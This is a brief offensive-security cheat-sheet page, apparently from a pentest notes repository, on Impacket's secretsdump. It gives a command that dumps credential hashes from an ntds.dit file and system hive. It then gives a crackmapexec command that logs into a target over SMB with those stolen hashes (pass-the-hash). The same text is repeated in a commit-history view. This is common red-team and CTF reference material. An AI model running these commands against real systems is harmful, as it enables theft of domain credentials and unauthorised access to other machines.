killchain-compendium/exploit/windows/docs/impacket.md

# Impacket

* [Repo](https://github.com/SecureAuthCorp/impacket)

## Secretsdump
* `ntds.dit` and `system.hive` are needed
```sh
secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
````
* Remove everything but the hashes
* Use it to log in on the target
```sh
crackmapexec smb $TARGET_IP -u <user> -H hashes.txt
```
second commit 2021-08-23 01:13:54 +02:00			`# Impacket`

			`* [Repo](https://github.com/SecureAuthCorp/impacket)`

added rsync enum alternative path 2022-01-09 22:52:39 +01:00			`## Secretsdump`
			* `ntds.dit` and `system.hive` are needed
			```sh
			`secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt`
			````
			`* Remove everything but the hashes`
			`* Use it to log in on the target`
			```sh
			`crackmapexec smb $TARGET_IP -u <user> -H hashes.txt`
			```